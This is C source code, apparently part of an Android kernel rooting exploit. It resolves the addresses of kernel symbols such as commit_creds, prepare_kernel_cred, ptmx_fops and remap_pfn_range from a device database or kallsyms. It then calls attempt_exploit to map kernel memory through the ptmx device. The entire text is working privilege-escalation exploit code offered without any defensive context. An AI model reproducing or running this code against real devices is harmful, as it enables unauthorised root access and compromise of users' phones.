static bool setup_param_from_database(void) { int i; if (mmc_protect_part) { if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) { return true; } } mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part)); if (!mmc_protect_part) { detect_mmc_protect(); mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part)); } mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type)); if (mmc_protect_part) { if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) { return true; } } mmc_protect_part = 0; mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN; return false; }
static bool get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) { *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); if (*prepare_kernel_cred_address && *commit_creds_address) { return true; } print_reason_device_not_supported(); return false; }
bool device_set_symbol_address(device_symbol_t symbol, unsigned long int address) { device_id_t device_id; unsigned long int old; sqlite3_stmt *st; int rc; if (address == 0) { return false; } old = device_get_symbol_address(symbol); if (old == address) { return true; } if (old) { printf("Duplicate symbol \"%s\": old = 0x%08x, new = 0x%08x\n", symbol, old, address); return false; } device_id = get_device_id(true); rc = sqlite3_prepare(db, SQL_REGISTER_DEVICE_ADDRESS, -1, &st, NULL); if (!IS_SQL_ERROR(rc)) { rc = sqlite3_reset(st); } if (!IS_SQL_ERROR(rc)) { rc = sqlite3_bind_int(st, 1, device_id); } if (!IS_SQL_ERROR(rc)) { rc = sqlite3_bind_text(st, 2, symbol, -1, SQLITE_STATIC); } if (!IS_SQL_ERROR(rc)) { char hex_address[20] = { 0 }; int length = snprintf(hex_address, sizeof(hex_address), "0x%08lx", address); rc = sqlite3_bind_text(st, 3, hex_address, length, SQLITE_STATIC); } if (!IS_SQL_ERROR(rc)) { rc = execute_sql(st); } if (IS_SQL_ERROR(rc)) { printf("%s(%d)\n", sqlite3_errmsg(db), sqlite3_errcode(db)); sqlite3_finalize(st); return false; } sqlite3_finalize(st); return true; }
static void * get_delayed_rsp_id_addresses(void) { void *value; value = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id)); if (value) { return value; } print_reason_device_not_supported(); return NULL; }
bool setup_remap_pfn_range_address(void) { if (remap_pfn_range) { return true; } remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); if (!remap_pfn_range && kallsyms_exist()) { remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range"); } return !!remap_pfn_range; }
bool setup_vmalloc_exec_address(void) { if (vmalloc_exec) { return true; } vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec)); if (!vmalloc_exec && kallsyms_exist()) { vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec"); } return !!vmalloc_exec; }
static unsigned long int get_kernel_physical_offset(void) { unsigned long int offset; offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (!offset) { offset = find_kernel_text_from_iomem(); } if (offset) { return offset; } return default_kernel_physical_offset; }
static unsigned long int get_ptmx_fops_address(void) { unsigned long int address; address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); if (address) { return address; } if (kallsyms_exist()) { address = kallsyms_get_symbol_address("ptmx_fops"); if (address) { return address; } } return 0; }
static bool setup_variables(void) { kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { return true; } kernel_physical_offset = find_kernel_text_from_iomem(); if (kernel_physical_offset) { return true; } kernel_physical_offset = find_kernel_text_from_config(); if (kernel_physical_offset) { return true; } print_reason_device_not_supported(); return false; }
bool run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; if (run_exploit_mmap(callback, &result)) { return result; } setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; } kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { printf("You need to manage to get kernel_physical_offset addresses.\n"); return false; } return attempt_exploit(ptmx_fops_mmap_address, (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); }